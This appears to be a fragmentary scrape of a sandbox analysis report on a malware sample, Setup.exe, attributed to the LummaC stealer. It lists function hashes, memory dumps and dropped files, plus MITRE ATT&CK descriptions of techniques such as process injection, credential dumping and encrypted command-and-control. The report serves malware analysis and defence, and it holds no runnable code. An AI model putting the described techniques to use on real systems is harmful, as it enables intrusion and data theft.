Instruction ID: 1414dafa1a1a5c59977f86d657b8d335ba854a3eb9394ff7f65e87b7c3362b6b
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: 2901F634A01108EFCB54DF98C684AACF7B1FB44321F208699ED019B384CB30BE86EB40

Function 00F5CE7F Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49a57a374e7b92da58926fee3662f18fbeca5f6832b05311bcfaf529b72eaefe
Instruction ID: 77d71fb73c48bc7b6c637240be80a1889d1e15d122f59f0988ca17eab331f55c
Opcode Fuzzy Hash: 49a57a374e7b92da58926fee3662f18fbeca5f6832b05311bcfaf529b72eaefe
Instruction Fuzzy Hash: C5E04F65A0E3D08FE3038B315CA1AA67FB8AD1750130E51EBD4C5D74B3E118D80DEB25

Function 00F5BC1F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179e546be2c89a5196f3c77cc577ea7f0a6bfaeda2597812c11e1b6d76dc7558
Instruction ID: 7689eaa874dd34b7df5da9dec32181a108fde4a108d577a9a326fac34469d256
Opcode Fuzzy Hash: 179e546be2c89a5196f3c77cc577ea7f0a6bfaeda2597812c11e1b6d76dc7558
Instruction Fuzzy Hash: 69E06D76E443505BD314CF20C8805A57322ABC7225B19C32CDD6D17390CA34AC46DA98

Function 00F77A9B Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34da6dfc78b610b8d01f5b053daabf976709746f79f29ed25fb5e1270cdb39c6
Instruction ID: 811bc2136c9aad90335ce9b3c55875507eb5a06adc9d49d47426033ed2f8441b
Opcode Fuzzy Hash: 34da6dfc78b610b8d01f5b053daabf976709746f79f29ed25fb5e1270cdb39c6
Instruction Fuzzy Hash: 4CD05B44E3CB5743B3191F25487133AA5D64B03312F28D06AD4D68B271E51DCA412795

Function 00F77D17 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1452c59139b1f1344503ac04a460069e96c8f72455f2677b5d088068f56243fa
Instruction ID: f570ecd46098945477d2cda5002067711e20734139de1194ef4295da0640c121
Opcode Fuzzy Hash: 1452c59139b1f1344503ac04a460069e96c8f72455f2677b5d088068f56243fa
Instruction Fuzzy Hash: 21D05E64A0C3C5CFC3224F285460271FFB04F53202F0854DEE4D11B241C2658908972B

Function 00F7A1BA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23c68ee6d107102acd3101cf2726d090810583b97606fe0fbea2f0981baea95e
Instruction ID: 3e39928d1371b5a6722d3551a25024f1be346b46f36541fdec4ac45982a5d80e
Opcode Fuzzy Hash: 23c68ee6d107102acd3101cf2726d090810583b97606fe0fbea2f0981baea95e
Instruction Fuzzy Hash: 0AB012E1C2810096D8049F206C81435B13C111B103F043420D409B3102D624D20C411D

Analysis Process: powershell.exePID: 3720, Parent PID: 6596COMMON

Executed Functions

Function 06DA1C10 Relevance: 5.6, Strings: 4, Instructions: 597COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06DA1F58
4'^q, xrefs: 06DA20BA
4'^q, xrefs: 06DA20B0
4'^q, xrefs: 06DA1F4E

Memory Dump Source

Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 1530458540cc4943a4210cd2c9a0bdb197aba546586b4f5a1f7efc5199a6cbb2
Instruction ID: 98aa450b574a17c49d01cc270c9999edfb02bfc0218ab8b2e5ff053e12263776
Opcode Fuzzy Hash: 1530458540cc4943a4210cd2c9a0bdb197aba546586b4f5a1f7efc5199a6cbb2
Instruction Fuzzy Hash: 55122632B083548FDB558B699C1076BBBA2AFC6310F18847AD945CB3A1DF36C945C3E2

Function 043F29F0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2018567458.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e306b511f300cecbd25bb3f1c940b7fbd833aa1f3766ce679d5c7f765251aab2
Instruction ID: 6c418351b3b10ecc3b48c41103ccffe55a0dea5d4b4aa83b7ed0e6f6b516f054
Opcode Fuzzy Hash: e306b511f300cecbd25bb3f1c940b7fbd833aa1f3766ce679d5c7f765251aab2
Instruction Fuzzy Hash: 9D915A74A00245CFCB15CF59C8949AEFBB1FF88310B2485A9D915AB3A5D736FC51CBA0

Function 06DA1BEF Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 233052c877f6a7e7175da1b450e3c2716df13dd0e6cd3b73131175cdda1bc1fe
Instruction ID: 85e899bd3a772e3b5c04843943c70620566253e5703f5fcfe581217250fe35af
Opcode Fuzzy Hash: 233052c877f6a7e7175da1b450e3c2716df13dd0e6cd3b73131175cdda1bc1fe
Instruction Fuzzy Hash: 76412432E09320CFDB958F658D41A7ABBB2AFC1350F1880A5D8419F261DB3AC941C7F1

Function 043F4C20 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2018567458.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b55be232dbd25fe38f2e8ba25c6b962eab913e04ce4f0d219546f03257cdb8
Instruction ID: a8a937ccf149777acabdf59e6c2e1449008543bd693b53f95d86e1ee743b7a9f
Opcode Fuzzy Hash: e6b55be232dbd25fe38f2e8ba25c6b962eab913e04ce4f0d219546f03257cdb8
Instruction Fuzzy Hash: CD41C375A0A3A59FCB02DB2CD9A04DABFB0AF46210B0541D7D484DB2A3D224ED49CBA5

Function 043F2B00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2018567458.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cae92fc2e72fc062a5db4f0f7822df81852651fe9f5c04784c59c2ffa08b6ff
Instruction ID: eefd81277332347b2c1f99402fe26711f2f3dc11db0d069652489ca6809c0966
Opcode Fuzzy Hash: 7cae92fc2e72fc062a5db4f0f7822df81852651fe9f5c04784c59c2ffa08b6ff
Instruction Fuzzy Hash: CE4139B4A10505DFCB09CF58C598AAAFBB1FF48310B258599D915AB368C736FC91CFA0

Function 043F4C10 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2018567458.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_43f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b60e3011f9a62437b34392844bfc00b98d2551baa6bce6eee3c92810a21f848
Instruction ID: 569bc470252ebead07bfd4b1434c9448d0ce159cbbd0e4a332d3646d8fef69fb
Opcode Fuzzy Hash: 3b60e3011f9a62437b34392844bfc00b98d2551baa6bce6eee3c92810a21f848
Instruction Fuzzy Hash: 4B211DB4A002499FDB00CF59D9809AAFBB5FF89310B158599D919AB362C731FC45CFA1

Function 03F9D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2017849375.0000000003F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3f9d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b194a445202dc94aa0f8868c7f7f9467988ccd1745a667e3186f1df4da8768b3
Instruction ID: d2401b5c0aec39b050960fd1fa712b2ec938c4492009acb27dee9b5467fee514
Opcode Fuzzy Hash: b194a445202dc94aa0f8868c7f7f9467988ccd1745a667e3186f1df4da8768b3
Instruction Fuzzy Hash: FE0184729093449AFB108A25CD84767FF98EF41324F2CC56AFD484A26AC6799841C6B1

Function 03F9D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2017849375.0000000003F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3f9d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60df50245799998d274f5e4ca6f87a3632020c1a35f94412fdbc29f201313ed1
Instruction ID: f9d8fca432c1e0403014bf1f9971d58f70b1b455fc2c14af7f61799b00f35250
Opcode Fuzzy Hash: 60df50245799998d274f5e4ca6f87a3632020c1a35f94412fdbc29f201313ed1
Instruction Fuzzy Hash: EC01216140E3C09FE7128B258C94752BFB4DF43224F1DC0DBE9888F1A7C2699845C772

Non-executed Functions

Function 06DA1270 Relevance: 14.2, Strings: 11, Instructions: 486COMMON

Download Yara Rule

Strings

tP^q, xrefs: 06DA12ED
k, xrefs: 06DA1800
$^q, xrefs: 06DA12A8
4'^q, xrefs: 06DA14D7
k, xrefs: 06DA1365
tP^q, xrefs: 06DA12F9
$^q, xrefs: 06DA1282
k, xrefs: 06DA180E
$^q, xrefs: 06DA12B4
k, xrefs: 06DA1357
4'^q, xrefs: 06DA14E1

Memory Dump Source

Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$k$k$k$k
API String ID: 0-1980677586
Opcode ID: b06fab3e118064dc7e87a31c51b55261c9628ec5957039b1d6ff5fafefb6ea06
Instruction ID: 936f3fe8e409ba4a3433efc504042a159449852f3545d8f0d333c0a6e6e12747
Opcode Fuzzy Hash: b06fab3e118064dc7e87a31c51b55261c9628ec5957039b1d6ff5fafefb6ea06
Instruction Fuzzy Hash: BBF11236F083148FDB649F6898016AABBF6AFC5320F18846AD546CB361DA36C945C7E1

Function 06DA04E0 Relevance: 12.8, Strings: 10, Instructions: 320COMMON

Download Yara Rule

Strings

$^q, xrefs: 06DA06F4
k, xrefs: 06DA0797
4'^q, xrefs: 06DA05EF
k, xrefs: 06DA07A5
#j, xrefs: 06DA05AF
tP^q, xrefs: 06DA072D
tP^q, xrefs: 06DA0739
4'^q, xrefs: 06DA05E3
$^q, xrefs: 06DA06C2
$^q, xrefs: 06DA06E8

Memory Dump Source

Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$#j$$^q$$^q$$^q$k$k
API String ID: 0-2299674365
Opcode ID: be4a781917d8e2508d2792e1958b2ae00b76c23ad26c237c95e3221035d8ad9a
Instruction ID: 3c81d5757c1df8c6260aad4456024eb58ee065b362e03a3ba282473db5d12bdc
Opcode Fuzzy Hash: be4a781917d8e2508d2792e1958b2ae00b76c23ad26c237c95e3221035d8ad9a
Instruction Fuzzy Hash: D5A16732F083548FD7658B39981067ABBE6AFC5328F28846BD445CB3A1DE36C845C7E1

Function 06DA3228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 06DA3284
$^q, xrefs: 06DA3290
$^q, xrefs: 06DA323A
$^q, xrefs: 06DA3256

Memory Dump Source

Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 8a75617ca29198dbdee93d33642b09051928692c349795bf71d40638d84170b5
Instruction ID: 503e42e86c236650b645ddc45d6fc75011e11131effc181f59928b5168c1f1bd
Opcode Fuzzy Hash: 8a75617ca29198dbdee93d33642b09051928692c349795bf71d40638d84170b5
Instruction Fuzzy Hash: 50212731B0C3159BE7B45E6A9805B27AADB9BC1B10F25842AE545CB385DE36C841C3E1

Function 06DA0308 Relevance: 5.1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

$^q, xrefs: 06DA0352
$^q, xrefs: 06DA035E
4'^q, xrefs: 06DA037F
4'^q, xrefs: 06DA0373

Memory Dump Source

Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 4567f865673027de37fda92e4196e585a7c8f467ef0734b651649feea619592f
Instruction ID: b8128a9ecb0464d5169bbe4e8d10d90608863d66acfeebd2cf399b79182fe9b6
Opcode Fuzzy Hash: 4567f865673027de37fda92e4196e585a7c8f467ef0734b651649feea619592f
Instruction Fuzzy Hash: 93017120B0E3958FD76A17281820A566FB65F82A14B2A449BC0C1CF2ABCD254C4983A3

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1odyn1qj.bmh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mn2pm3my.kvn.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phlq24iz.aln.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi51u4ma.c5p.psm1

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
Setup.exe

Function 00F5041F Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 399
threadCOMMON

Function 00F50B2F Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 00F509DF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Function 00F9C05D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Function 00F9ACAF Relevance: 2.8, APIs: 2, Instructions: 325
memoryCOMMON

Function 00F864E3 Relevance: 44.1, Strings: 35, Instructions: 305
COMMON

Function 00F74F8C Relevance: 29.2, Strings: 23, Instructions: 455
COMMON

Function 00F61C96 Relevance: 20.8, Strings: 16, Instructions: 772
COMMON

Function 00F79BE9 Relevance: 14.2, Strings: 11, Instructions: 463
COMMON

Function 00F5CFFA Relevance: 13.9, Strings: 11, Instructions: 190
COMMON